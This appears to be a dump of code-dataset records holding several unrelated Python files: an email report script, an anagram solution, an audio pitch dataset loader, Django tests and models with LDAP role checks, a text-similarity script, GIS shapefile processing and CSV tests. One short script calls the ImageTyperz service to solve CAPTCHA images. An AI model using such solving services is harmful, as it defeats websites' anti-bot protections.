oil price from http://www.nasdaq.com/markets/crude-oil.aspx\")\nmsg.attach(part)\n\npart = MIMEApplication(open(\"crude_clf16_wti_latest.png\",\"rb\").read())\npart.add_header('Content-Disposition', 'attachment', filename=\"crude_clf16_wti_latest.png\")\nmsg.attach(part)\n\nsmtp = SMTP(\"smtp.gmail.com\") #should work with yahoo smtp, or any other smtp, check if you need to start tls though\nsmtp.ehlo()\nsmtp.starttls()\nsmtp.login(\"user id\",\"password\") #Edit this derp\n\nsmtp.sendmail(msg['From'], msg['To'], msg.as_string())\n\n# To do\n# Clean up and make it more pythonic, add more keys to the msg object for body, file_attachment, and whatever else. This does the trick for now while I check with further with my girlfriend what she wants to see in the email\n","sub_path":"get_crude_oil.py","file_name":"get_crude_oil.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"25740707","text":"class Solution(object):\n\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n lookup = {}\n for word in strs:\n key = ''.join(sorted(word))\n if key in lookup:\n lookup[key].append(word)\n else:\n lookup[key] = [word]\n return list(lookup.values())\n","sub_path":"001-100/049-group-anagrams/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"374429869","text":"import torch\r\nfrom torch.utils.data import Dataset\r\n\r\nimport librosa\r\nimport os\r\nimport numpy as np\r\nimport random\r\nimport time\r\nimport json\r\nimport pickle\r\nimport argparse\r\n\r\ndef do_svs_spleeter(y, sr):\r\n from spleeter.separator import Separator\r\n import warnings\r\n separator = Separator('spleeter:2stems')\r\n warnings.filterwarnings('ignore')\r\n\r\n if sr != 44100:\r\n y = librosa.core.resample(y= y, orig_sr= sr, target_sr= 44100)\r\n\r\n waveform = np.expand_dims(y, axis= 1)\r\n\r\n prediction = separator.separate(waveform)\r\n # print (prediction[\"vocals\"].shape)\r\n ret_voc = librosa.core.to_mono(prediction[\"vocals\"].T)\r\n ret_voc = np.clip(ret_voc, -1.0, 1.0)\r\n\r\n ret_acc = librosa.core.to_mono(prediction[\"accompaniment\"].T)\r\n ret_acc = np.clip(ret_acc, -1.0, 1.0)\r\n del separator\r\n\r\n return ret_voc, ret_acc\r\n\r\n\r\ndef get_feature(audio_path):\r\n # TODO: Load audio from audio_path and generate feature.\r\n # return a 2-d (or maybe 3-d) array with shape (n, d) or (c, n, d), where n is the total frame number.\r\n y, sr = librosa.core.load(audio_path, mono=True)\r\n y_voc, y_acc = do_svs_spleeter(y, sr)\r\n\r\n y_acc = librosa.core.resample(y=y_acc, orig_sr=44100, target_sr=25600)\r\n\r\n feature = np.abs(librosa.cqt(y_acc, sr=25600, hop_length=256, fmin=librosa.midi_to_hz(24)\r\n , n_bins=96*4, bins_per_octave=12*4, filter_scale=1)).T\r\n # print (feature.shape)\r\n return feature\r\n # print (y.shape)\r\n\r\ndef process_pitch_and_note(json_path, feature_length):\r\n\r\n with open(json_path) as json_data:\r\n gt = json.load(json_data)\r\n pitch = gt[\"pitch\"] #(23446, 2)\r\n notes = gt[\"st\"] #(350, 2)\r\n \r\n # TODO: Match pitch and notes, return three lists: score_pitch (the pitch of the note), pitch_diff, \"is_inlier\"\r\n # inlier[i] = True if the frame i contains note, and the note prediction of frame i is correct.\r\n # The frame size of this function should be the same as the frame size of get_feature function.\r\n \r\n # print (feature_length)\r\n score_pitch = []\r\n is_inlier = []\r\n pitch_diff = []\r\n former_note = []\r\n next_note = []\r\n former_distance = []\r\n latter_distance = []\r\n\r\n cur_offset = 0\r\n # for j in range(1):\r\n for j in range(len(notes)):\r\n a = int(round(notes[j][0]*100.0))\r\n b = int(round(notes[j][1]*100.0))\r\n k = []\r\n\r\n for i in range(cur_offset, a):\r\n is_inlier.append(False)\r\n pitch_diff.append(0)\r\n score_pitch.append(0)\r\n former_note.append(0)\r\n next_note.append(0)\r\n former_distance.append(0)\r\n latter_distance.append(0)\r\n\r\n cur_offset = b\r\n\r\n # k = [pitch[a][1],]\r\n\r\n # bool_ = 0\r\n \r\n pitch_diff_abs = []\r\n\r\n for i in range(a, b):\r\n if pitch[i][1] > 0:\r\n k.append(pitch[i][1])\r\n pitch_diff_abs.append(abs(notes[j][2]-pitch[i][1]))\r\n k = np.array(k)\r\n\r\n # print (k)\r\n pitch_med = np.median(k)\r\n pitch_max = np.max(k)\r\n pitch_min = np.min(k)\r\n\r\n if (pitch_min <= notes[j][2] or pitch_max >= notes[j][2]) and max(pitch_diff_abs) <= 3:\r\n for i in range(a, b):\r\n if pitch[i][1] > 0:\r\n is_inlier.append(True)\r\n pitch_diff.append(notes[j][2]-pitch[i][1])\r\n score_pitch.append(notes[j][2])\r\n former_note.append(notes[j-1][2])\r\n if j != len(notes)-1:\r\n next_note.append(notes[j+1][2])\r\n else:\r\n next_note.append(0)\r\n former_distance.append(i-a)\r\n latter_distance.append(b-i)\r\n\r\n else:\r\n is_inlier.append(False)\r\n pitch_diff.append(0)\r\n score_pitch.append(0)\r\n former_note.append(0)\r\n next_note.append(0)\r\n former_distance.append(0)\r\n latter_distance.append(0)\r\n else:\r\n for i in range(a, b):\r\n is_inlier.append(False)\r\n pitch_diff.append(0)\r\n score_pitch.append(0)\r\n former_note.append(0)\r\n next_note.append(0)\r\n former_distance.append(0)\r\n latter_distance.append(0)\r\n\r\n # print (pitch_med, pitch_max, pitch_min) \r\n # print (notes[j])\r\n \r\n \r\n # score_pitch.append(notes[j][2])\r\n # pitch_diff.append(abs(score_pitch-pitch_med))\r\n # print (cur_offset)\r\n for i in range(cur_offset, feature_length):\r\n is_inlier.append(False)\r\n pitch_diff.append(0)\r\n score_pitch.append(0)\r\n former_note.append(0)\r\n next_note.append(0)\r\n former_distance.append(0)\r\n latter_distance.append(0)\r\n\r\n \r\n score_pitch = np.array(score_pitch)\r\n pitch_diff = np.array(pitch_diff)\r\n is_inlier = np.array(is_inlier)\r\n former_note = np.array(former_note)\r\n next_note = np.array(next_note)\r\n former_distance = np.array(former_distance)\r\n latter_distance = np.array(latter_distance)\r\n\r\n print (score_pitch.shape)\r\n print (pitch_diff.shape)\r\n print (is_inlier.shape)\r\n print (former_note.shape)\r\n print (next_note.shape)\r\n print (former_distance.shape)\r\n print (latter_distance.shape)\r\n\r\n # (23446, n)\r\n return (score_pitch, pitch_diff, is_inlier, former_note, next_note, former_distance, latter_distance)\r\n \r\n \r\nclass PitchDiffDataset(Dataset):\r\n def __init__(self, json_paths, audio_paths):\r\n self.features = []\r\n self.score_pitch = []\r\n self.pitch_diff = []\r\n self.is_inlier = []\r\n self.former_note = []\r\n self.next_note = []\r\n self.former_distance = []\r\n self.latter_distance = []\r\n\r\n for i in range(len(json_paths)):\r\n\r\n json_path = json_paths[i]\r\n audio_path = audio_paths[i]\r\n\r\n features = get_feature(audio_path)\r\n features = np.array(features)\r\n score_pitch, pitch_diff, is_inlier, former_note, next_note, former_distance, latter_distance = process_pitch_and_note(json_path, features.shape[-2])\r\n\r\n # print (score_pitch)\r\n # print (pitch_diff)\r\n\r\n self.features.append(features) #(23446, 384)\r\n self.score_pitch.append(score_pitch) #(23446,)\r\n self.pitch_diff.append(pitch_diff) #(23446,)\r\n self.is_inlier.append(is_inlier) #(23446,)\r\n self.former_note.append(former_note)\r\n self.next_note.append(next_note)\r\n self.former_distance.append(former_distance)\r\n self.latter_distance.append(latter_distance)\r\n\r\n def __getitem__(self, idx):\r\n return (self.features[idx], self.score_pitch[idx], self.pitch_diff[idx], self.is_inlier[idx], self.former_note[idx], self.next_note[idx], self.former_distance[idx], self.latter_distance[idx])\r\n\r\n def __len__(self):\r\n return len(self.features)\r\n","sub_path":"dataset_0804.py","file_name":"dataset_0804.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"76336515","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework.test import APITestCase, APIClient\nfrom rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom .models import *\n# Create your tests here.\n\n\nclass NewsTest(APITestCase):\n\n def setUp(self):\n self.user = CustomUser.objects.create(phone=\"996777329848\")\n self.token = Token.objects.create(user=self.user)\n self.client = APIClient()\n self.news = News.objects.create(title=\"lalaland\",image=None,text='Pomogite')\n self.create_url = reverse('news_comments',kwargs={'pk': self.news.pk})\n\n def test_create_comment(self):\n data = {\n \"comment_field\":\"testcomment to new\",\n }\n self.client.force_authenticate(user=self.user)\n response = self.client.post(self.create_url,data)\n self.assertEqual(response.status_code,status.HTTP_201_CREATED)\n self.assertEqual(Comment.objects.count(),1)\n\n def test_create_comment_non_auth_user(self):\n data = {\n \"comment_field\":\"cheto ne ochen\"\n }\n response = self.client.post(self.create_url,data)\n self.assertEqual(response.status_code,status.HTTP_401_UNAUTHORIZED)\n","sub_path":"news/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"541889921","text":"import json\n\nfrom django.contrib.auth.models import AbstractUser\nfrom django.contrib.auth.signals import user_logged_in\nfrom django.db import models\nfrom ldap3 import ALL, LEVEL, Connection, Server\nfrom url_or_relative_url_field.fields import URLOrRelativeURLField\n\n# Regular model classes\n\n\nclass Person(AbstractUser):\n sciper = models.IntegerField(null=True, blank=True, default=None)\n _is_dean = models.BooleanField(null=False, blank=False, default=False)\n\n def get_is_dean(self, *args, **kwargs):\n \"\"\" Returns a boolean value indicating if the current user is dean.\n Optionaly, you can pass a parameter called already_checked_users (list) containing the list of scipers of delegates that have already been inspected.\n This option exists in order to avoid infinite recursions (A delegates his role to A)\"\"\"\n\n already_checked_users = kwargs.get('already_checked_users', list())\n already_checked_users.append(self.sciper)\n\n if self._is_dean:\n return True\n\n delegators = self.person_set.all()\n for delegator in delegators:\n if delegator not in already_checked_users:\n if delegator.get_is_dean(already_checked_users=already_checked_users):\n return True\n\n return False\n\n def set_is_dean(self, value):\n self._is_dean = value\n\n is_institute_manager = models.BooleanField(null=False, blank=False, default=False)\n _managed_institutes = models.TextField(blank=True, null=True, default=None)\n\n def get_managed_institutes(self, *args, **kwargs):\n already_checked_users = kwargs.get('already_checked_users', list())\n\n institutes = list()\n\n # Load the institutes managed by the person itself\n already_checked_users.append(self.sciper)\n if self._managed_institutes != '' and self._managed_institutes is not None:\n institutes.extend(json.loads(self._managed_institutes))\n\n # Load the institutes managed through delegation\n delegators = self.person_set.all()\n for delegator in delegators:\n if delegator.sciper not in already_checked_users:\n institutes.extend(delegator.get_managed_institutes(already_checked_users=already_checked_users))\n\n return institutes\n\n # def set_managed_institutes(self, value):\n # self._managed_institutes = json.dumps(value)\n\n delegates = models.ManyToManyField(\"self\", symmetrical=False, blank=True, null=True, default=None)\n\n _is_prof = models.BooleanField(null=False, blank=False, default=False)\n\n def get_is_prof(self):\n return self._is_prof\n\n def set_is_prof(self, value):\n self._is_prof = value\n\n _is_associate_dean = models.BooleanField(null=False, blank=False, default=False)\n\n def get_is_associate_dean(self):\n return self._is_associate_dean\n\n def set_is_associate_dean(self, value):\n self._is_associate_dean = value\n\n def get_prof_delegations(self, *args, **kwargs):\n already_checked_users = kwargs.get('already_checked_users', list())\n\n return_value = list()\n\n if self.sciper not in already_checked_users:\n already_checked_users.append(self.sciper)\n if self.get_is_prof():\n return_value.append({'sciper': self.sciper,\n 'first_name': self.first_name,\n 'last_name': self.last_name})\n\n delegators = self.person_set.all()\n for delegator in delegators:\n if delegator.sciper not in already_checked_users:\n return_value.extend(delegator.get_prof_delegations(already_checked_users=already_checked_users))\n\n return return_value\n\n\n# Signals processing\n\ndef check_authorizations(sender, user, request, **kwargs):\n \"\"\"Check if the user who just logged in is dean in LDAP.\n Populates the is_dean flag accordingly\"\"\"\n\n ldap_server = Server('ldap.epfl.ch', use_ssl=True, get_info=ALL)\n conn = Connection(ldap_server, auto_bind=True)\n base_dn = \"o=epfl,c=ch\"\n\n # check if the user is dean\n is_dean = False\n filter = '(&(description;lang-en=school*)(unitManager={}))'.format(user.sciper)\n conn.search(base_dn, filter, search_scope=LEVEL, attributes=['ou'])\n for entry in conn.entries:\n current_ou = min(entry['ou'], key=len)\n if current_ou == 'STI':\n is_dean = True\n break\n user.set_is_dean(is_dean)\n\n # Check if the user manages institutes\n # is_institute_manager = False\n # managed_institutes = list()\n\n # base_dn = 'ou=sti,o=epfl,c=ch'\n # filter = '(&(description;lang-en=*institute*)(unitManager={}))'.format(user.sciper)\n # conn.search(base_dn, filter, search_scope=LEVEL, attributes=['ou'])\n # if len(conn.entries) > 0:\n # is_institute_manager = True\n # for entry in conn.entries:\n # managed_institutes.append(min(entry['ou'], key=len))\n\n # user.is_institute_manager = is_institute_manager\n # user.set_managed_institutes(managed_institutes)\n\n # Check if the user is a prof\n is_prof = False\n base_dn = \"o=epfl,c=ch\"\n filter = \"(&(uniqueIdentifier={})(|(memberOf=corps-enseignant-epfl)(memberOf=corps-enseignant-sti)(memberOf=enseignants-epfl)(memberOf=EnseignantsSTI)(memberOf=professeurs-epfl)(title;lang-en=*professor*)(userClass=Corp professoral)))\".format(user.sciper)\n conn.search(base_dn, filter)\n if len(conn.entries) > 0:\n is_prof = True\n user.set_is_prof(is_prof)\n\n user.save()\n\n\nuser_logged_in.connect(check_authorizations)\n\n\n# objects not existing in the database\n\nclass NextStep(object):\n def __init__(self, title=None, description=None, link=None):\n self.title = title\n self.description = description\n self.link = link\n","sub_path":"sti_prof_dashboard/dashboard/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"639742877","text":"from django.shortcuts import render, redirect, reverse\nfrom django.contrib import messages\n\nfrom courses.models import Course\n\n\ndef view_basket(request):\n \"\"\" A view that renders basket page \"\"\"\n\n return render(request, 'basket/basket.html')\n\n\ndef add_to_basket(request, course_id):\n \"\"\" Add a quantity of the specified product to the shopping basket \"\"\"\n redirect_url = request.POST.get('redirect_url')\n basket = request.session.get('basket', {})\n course = Course.objects.get(pk=course_id)\n\n if course_id not in basket:\n basket[course_id] = course_id\n\n else:\n basket[course_id] = course_id\n messages.success(request, f'Added {course.name} to your basket')\n\n request.session['basket'] = basket\n return redirect(redirect_url)\n\n\ndef delete_from_basket(request, course_id):\n \"\"\"Delete item from cart\"\"\"\n\n course = Course.objects.get(pk=course_id)\n basket = request.session.get('basket', {})\n\n if course_id in basket:\n del basket[course_id]\n messages.success(request, f'Removed {course.name} from your bag')\n\n request.session['basket'] = basket\n return redirect(reverse('view_basket'))\n","sub_path":"basket/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"514666956","text":"from itertools import chain\r\nfrom glob import glob\r\nimport string\r\nimport os\r\nimport math\r\nimport re\r\n\r\ndef frequence(filename):\r\n\t#words_to_lower(filename)\r\n\r\n\tlst = words_to_list(filename)\r\n\t#print(lst)\r\n\t#lst = remove(lst)\r\n\tdic = {}\r\n\tfor word in lst:\r\n\t\tif word in dic:\r\n\t\t\tdic[word]=dic[word]+1\r\n\t\telse:\r\n\t\t\tdic[word] = 1\r\n\tdic = remove_space(dic)\r\n\treturn dic\r\n\r\n# def words_to_lower(filename):\r\n# \tfile = open(filename,\"r\")\r\n# \tlines = [line.lower() for line in file]\r\n# \twith open(filename, 'w') as out:\r\n# \t\tout.writelines(lines)\r\n\r\n# \treturn file\r\n\r\ndef words_to_list(filename):\r\n\t#self.filename = filename\r\n\tlst = []\r\n\toriginal_string = open(filename).read()\r\n\tnew_string = re.sub('[^a-zA-Z0-9\\n]', ' ', original_string)\r\n\topen('temp.txt', 'w').write(new_string)\r\n\tfile1 = open(filename,'r')\r\n\tfor line in file1:\r\n\t\tlst.extend(line.lower().split())\r\n\r\n\treturn lst\r\n\r\n# def remove(lst):\r\n\r\n# \ttemplst = [word.strip(string.punctuation) for word in lst]\r\n\r\n# \treturn templst\r\n\r\ndef remove_space(dictionary):\r\n\tif '' in dictionary:\r\n\t\tdel dictionary['']\r\n\treturn dictionary\r\n\r\ndef dot_product(d1 = {},d2 = {}):\r\n\tdotresult = {}\r\n\tfor x in d1:\r\n\t\tif x in d2:\r\n\t\t\tdotresult[x] = d1[x] * d2[x]\r\n\r\n\tfor y in d2:\r\n\t\tif y in d1:\r\n\t\t\tdotresult[y] = d2[y]*d1[y]\r\n\r\n\treturn dotresult\r\n\r\ndef sum_dotproduct(d1 = {}):\r\n\ttotal = sum(d1.values())\r\n\treturn total\r\n\r\ndef square_dictvalues(d1 = {}):\r\n\ttotal = 0\r\n\tfor x in d1:\r\n\t\ttotal = total+ d1[x]**2\r\n\t#total = sum(d1.values())\r\n\treturn total\r\n\r\ndef similarity_function(a,b,c):\r\n\r\n\tresult = a/((b**(0.5))*(c** (0.5)))\r\n\r\n\treturn result#round(result,2)\r\n\r\n# file1 = open(\"Test.txt\",\"r\")\r\n# lines = [line.lower() for line in file1]\r\n# with open('Test.txt', 'w') as out:\r\n# out.writelines(sorted(lines))\r\n\r\ndef bag_of_words(path):\r\n\tpathlist = [p for p in os.listdir(path) if p.endswith('.txt') and p != \"temp.txt\"]\r\n\t#print(pathlist)\r\n\tos.chdir(path)\r\n\tmatrix2 = []\r\n\r\n\tfor i in range(len(pathlist)):\r\n\t\tmatrix = []\r\n\t\tfile1 = frequence(pathlist[i])\r\n\t\tfor j in range(len(pathlist)):\r\n\t\t\tfiless1 = 0\r\n\t\t\tfile2 = frequence(pathlist[j])\r\n\t\t\tres = dot_product(file1,file2)\r\n\t\t\tsumi = sum_dotproduct(res)\r\n\t\t\tfiless1 = square_dictvalues(file1)\r\n\t\t\tfiless2 = square_dictvalues(file2)\r\n\t\t\tfinal = similarity_function(sumi,filess1,filess2) * 100.0\r\n\t\t\tmatrix.append(round(final,2))\r\n\t\tmatrix2.append(matrix)\r\n\r\n\treturn matrix2\r\n\r\n\r\n# file1 = frequence('Comands for github.txt')\r\n# print(file1)\r\n\r\n# file2 = frequence('Comands for github.txt')\r\n\r\n# print(file2)\r\n\r\n# res = dot_product(file1,file2)\r\n\r\n# print(\"res =\",res)\r\n\r\n# sumi = sum_dotproduct(res)\r\n\r\n# filess1 = square_dictvalues(file1)\r\n\r\n# filess2 = square_dictvalues(file2)\r\n\r\n# print(sumi,filess1,filess2)\r\n\r\n# print(similarity_function(sumi,filess1,filess2))\r\nuser_input = input(\"Please enter the path for comparison : \")\r\n\r\nfinal_result = bag_of_words(user_input)\r\n\r\nlistoffiles = [p for p in os.listdir(user_input) if p.endswith('.txt')]\r\n\r\nlistoffiles = [\" \"]+listoffiles\r\n\r\n#print(listoffiles)\r\n\r\n# for x in listoffiles:\r\n# \tprint(x,\" \",end='')\r\n\r\n\r\nfor x in range(len(final_result)):\r\n\tfor y in range(len(final_result[x])):\r\n\t\tprint(final_result[x][y], \" \",end='')\r\n\tprint(\"\\n\")\r\n#print(test)","sub_path":"bag_of_wordsv2.0.py","file_name":"bag_of_wordsv2.0.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"404052552","text":"# checks for project, clip, calculate length, get_anode_bnode\nimport arcpy\nimport os\nimport pandas\nfrom merge import *\nimport math\n\narcpy.env.overwriteOutput = True\n\nfeature_layer = \"fl\"\nmf = \"m_feature\"\n\n# same projection for all\nsr_wgs1984 = arcpy.SpatialReference(4326)\n\nlist_of_shp = os.listdir(shp_folder)\nlist_of_shp = [x for x in list_of_shp if '.shp' in x]\nlist_of_shp = [x for x in list_of_shp if 'lock' not in x]\n\ndef get_where_clause(colname, list_of_link_ids):\n wh_cl = \"\"\n for id in list_of_link_ids:\n wh_cl = wh_cl + \"\"\"\"{0}\" = {1} OR \"\"\".format(colname, id)\n return wh_cl[:-4]\n\n# create clip shp\narcpy.MakeFeatureLayer_management(all_area_shp, all_area_shp_f)\nwhere_clause = get_where_clause(\"ABBR\", clip_state_list)\narcpy.SelectLayerByAttribute_management(all_area_shp_f, \"NEW_SELECTION\", where_clause)\n\narcpy.CopyFeatures_management(all_area_shp_f,m)\narcpy.Dissolve_management(m, clip_area_shp, \"\", \"\", \"SINGLE_PART\", \"\")\n\nfor shp in list_of_shp:\n m = shp_folder + shp\n sr_curr_network = arcpy.Describe(m).spatialReference\n # project it to specified projection if else\n if sr_curr_network.name != sr_wgs1984.name:\n print(\"Projecting to WGS1984...\")\n arcpy.Project_management(m, temp_temp, sr_wgs1984)\n arcpy.CopyFeatures_management(temp_temp, m1)\n else:\n arcpy.CopyFeatures_management(m, m1)\n\n arcpy.MakeFeatureLayer_management(m1, mf)\n clip_area_shp\n arcpy.SelectLayerByLocation_management(mf,\"COMPLETELY_WITHIN\",clip_area_shp)\n arcpy.CopyFeatures_management(mf, m2)\n print(\"Clipping to desired area...\")\n #\n # check for multipart features\n multipart_dict = {}\n with arcpy.da.SearchCursor(m2, [\"OBJECTID\", \"SHAPE@\"]) as cursor:\n for row in cursor:\n count = row[1].partCount\n if count > 1:\n multipart_dict.setdefault(row[0], []).append(count)\n #\n if len(multipart_dict.keys()) > 0:\n print (\"Please fix multipart on {0} and run again\".format(shp))\n print(\"LinkID: {0}:\".format(multipart_dict))\n pandas.DataFrame(multipart_dict).to_csv(multipart_csv)\n exit(0)\n # put FID, miles, ANODE and BNODE on each\n fieldnames = [f.name for f in arcpy.ListFields(m2)]\n fieldnames = [x for x in fieldnames if x not in (\"FID\", \"Shape\", \"OBJECTID\")]\n # print fieldnames\n # remove everything except\n arcpy.DeleteField_management(m2, fieldnames)\n #add points\n print (\"Adding Coordinates to points...\")\n arcpy.FeatureVerticesToPoints_management(m2, p1, \"BOTH_ENDS\")\n #\n arcpy.DeleteIdentical_management(p1, ['Shape'])\n #\n arcpy.AddField_management(p1, \"_ID_\", \"LONG\")\n arcpy.CalculateField_management(p1, \"_ID_\", '!FID!', \"PYTHON\")\n #\n arcpy.AddField_management(m2, \"_ID_\", \"LONG\")\n arcpy.AddField_management(m2, \"_LEN_\", \"DOUBLE\")\n arcpy.AddField_management(m2, \"_A_\", \"LONG\")\n arcpy.AddField_management(m2, \"_B_\", \"LONG\")\n arcpy.CalculateField_management(m2, \"_ID_\", '!FID!', \"PYTHON\")\n arcpy.CalculateField_management(m2, \"_LEN_\", '!Shape.length@miles!', \"PYTHON\")\n #\n # creating coord-id dict\n coord_to_node_dict = {}\n with arcpy.da.SearchCursor(p1, [\"SHAPE@XY\",\"_ID_\"], spatial_reference = sr_wgs1984) as cursor:\n for coord,id in cursor:\n coord_to_node_dict[coord[0],coord[1]] = id\n #\n with arcpy.da.UpdateCursor(m2, [\"SHAPE@\", \"_A_\", \"_B_\"], spatial_reference = sr_wgs1984 ) as cursor:\n for row in cursor:\n # get the exact coordinates and map it to the ID\n coord_start = (row[0].firstPoint.X, row[0].firstPoint.Y)\n coord_end = (row[0].lastPoint.X, row[0].lastPoint.Y)\n row[1] = coord_to_node_dict[coord_start]\n row[2] = coord_to_node_dict[coord_end]\n cursor.updateRow(row)\n #\n arcpy.CopyFeatures_management(m2, intermediate_folder + shp)\n arcpy.CopyFeatures_management(p1, intermediate_folder + \"pt_\" + shp)","sub_path":"merge_maps(c2)/simplify.py","file_name":"simplify.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"757886","text":"#!/usr/bin/python3\n\nfrom imagetyperzapi3.imagetyperzapi import ImageTyperzAPI\n\ndef test_api():\n access_token = 'access_token_here'\n # get access token from: http://www.imagetyperz.com/Forms/ClientHome.aspx\n ita = ImageTyperzAPI(access_token) # init imagetyperz api obj\n\n # check account balance\n balance = ita.account_balance() # get account balance\n print('Balance: {}'.format(balance)) # print balance\n\n print('Waiting for captcha to be solved ...')\n # works with URL too, if authenticated using token\n captcha_id = ita.submit_image('captcha.jpg')\n # optional parameters for image captcha\n # captcha_id = ita.solve_captcha('captcha.jpg', is_case_sensitive = False, is_phrase = False, digits_only = False, letters_only = True, is_math = False, min_length = 2, max_length = 10)\n response = ita.retrieve_response(captcha_id)\n print('Response: {}'.format(response)) # print response of captcha\n\n# main method\ndef main():\n try:\n test_api() # test captcha API\n except Exception as ex:\n print('[!] Error occured: {}'.format(ex))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"319581872","text":"from contextlib import contextmanager, redirect_stdout\nfrom io import StringIO\nimport imp\nimport os\nimport sys\nfrom textwrap import dedent\nfrom tempfile import NamedTemporaryFile\nimport unittest\n\n\nclass FixCSVTests(unittest.TestCase):\n\n \"\"\"Tests for fix_csv.py\"\"\"\n\n maxDiff = None\n\n def test_pipe_file_to_csv_file(self):\n old_contents = dedent(\"\"\"\n 2012|Lexus|LFA\n 2009|GMC|Yukon XL 1500\n 1965|Ford|Mustang\n 2005|Hyundai|Sonata\n 1995|Mercedes-Benz|C-Class\n \"\"\").lstrip()\n expected = dedent(\"\"\"\n 2012,Lexus,LFA\n 2009,GMC,Yukon XL 1500\n 1965,Ford,Mustang\n 2005,Hyundai,Sonata\n 1995,Mercedes-Benz,C-Class\n \"\"\").lstrip()\n with make_file(old_contents) as old, make_file(\"\") as new:\n output = run_program('fix_csv.py', args=[old, new])\n with open(new) as new_file:\n new_contents = new_file.read()\n self.assertEqual(expected, new_contents)\n self.assertEqual(\"\", output)\n\n def test_original_file_is_unchanged(self):\n old_contents = dedent(\"\"\"\n 2012|Lexus|LFA\n 2009|GMC|Yukon XL 1500\n \"\"\").lstrip()\n with make_file(old_contents) as old, make_file(\"\") as new:\n run_program('fix_csv.py', args=[old, new])\n with open(old) as old_file:\n contents = old_file.read()\n self.assertEqual(old_contents, contents)\n\n @unittest.expectedFailure\n def test_delimiter_in_output(self):\n old_contents = dedent(\"\"\"\n 02|Waylon Jennings|Honky Tonk Heroes (Like Me)\n 04|Kris Kristofferson|To Beat The Devil\n 11|Johnny Cash|Folsom Prison Blues\n 13|Billy Joe Shaver|Low Down Freedom\n 21|Hank Williams III|Mississippi Mud\n 22|David Allan Coe|Willie, Waylon, And Me\n 24|Bob Dylan|House Of The Risin' Sun\n \"\"\").lstrip()\n expected = dedent(\"\"\"\n 02,Waylon Jennings,Honky Tonk Heroes (Like Me)\n 04,Kris Kristofferson,To Beat The Devil\n 11,Johnny Cash,Folsom Prison Blues\n 13,Billy Joe Shaver,Low Down Freedom\n 21,Hank Williams III,Mississippi Mud\n 22,David Allan Coe,\"Willie, Waylon, And Me\"\n 24,Bob Dylan,House Of The Risin' Sun\n \"\"\").lstrip()\n with make_file(old_contents) as old, make_file(\"\") as new:\n output = run_program('fix_csv.py', args=[old, new])\n with open(new) as new_file:\n new_contents = new_file.read()\n self.assertEqual(expected, new_contents)\n self.assertEqual(\"\", output)\n\n @unittest.expectedFailure\n def test_call_with_too_many_files(self):\n with make_file(\"\") as old, make_file(\"\") as new:\n with self.assertRaises(BaseException):\n run_program('fix_csv.py', args=[old, new, old])\n\n\ndef run_program(path, args=[]):\n \"\"\"\n Run program at given path with given arguments.\n\n If raises is specified, ensure the given exception is raised.\n \"\"\"\n old_args = sys.argv\n assert all(isinstance(a, str) for a in args)\n try:\n sys.argv = [path] + args\n with redirect_stdout(StringIO()) as output:\n try:\n if '__main__' in sys.modules:\n del sys.modules['__main__']\n imp.load_source('__main__', path)\n except SystemExit as e:\n if e.args != (0,):\n raise\n del sys.modules['__main__']\n return output.getvalue()\n finally:\n sys.argv = old_args\n\n\n@contextmanager\ndef make_file(contents=None):\n \"\"\"Context manager providing name of a file containing given contents.\"\"\"\n with NamedTemporaryFile(mode='wt', encoding='utf-8', delete=False) as f:\n if contents:\n f.write(contents)\n try:\n yield f.name\n finally:\n os.remove(f.name)\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","sub_path":"oreilly_code_refactoring_training/test_fix_csv.py","file_name":"test_fix_csv.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"298879085","text":"import csv\nfrom os.path import dirname, join\n\nfrom flask import current_app\nimport iatikit\nfrom bdd_tester import BDDTester\n\nfrom . import utils\n\n\ndef get_current_countries(publisher, current_data):\n country_codes = []\n\n for dataset in publisher.datasets:\n for idx, activity in enumerate(dataset.activities):\n if dataset.name not in current_data or idx not in current_data[dataset.name] or current_data[dataset.name][idx] is False:\n continue\n country_codes += activity.etree.xpath('recipient-country/@code')\n country_codes = list(set(country_codes))\n return country_codes\n\n\ndef country_strategy_or_mou(org, snapshot_date, test_name,\n current_data_results):\n iati_result_path = current_app.config.get('IATI_RESULT_PATH')\n output_filepath = join(iati_result_path,\n snapshot_date, org.organisation_code,\n utils.slugify(test_name) + '.csv')\n\n iati_data_path = current_app.config.get('IATI_DATA_PATH')\n snapshot_xml_path = join(iati_data_path, snapshot_date)\n publisher = iatikit.data(snapshot_xml_path).publishers.get(\n org.registry_slug)\n\n current_country_codes = get_current_countries(\n publisher, current_data_results)\n\n if current_country_codes == []:\n return\n\n country_strategies = {}\n for dataset in publisher.datasets:\n for idx, activity in enumerate(dataset.activities):\n if dataset.name not in current_data_results or idx not in current_data_results[dataset.name] or current_data_results[dataset.name][idx] is False:\n continue\n mous = 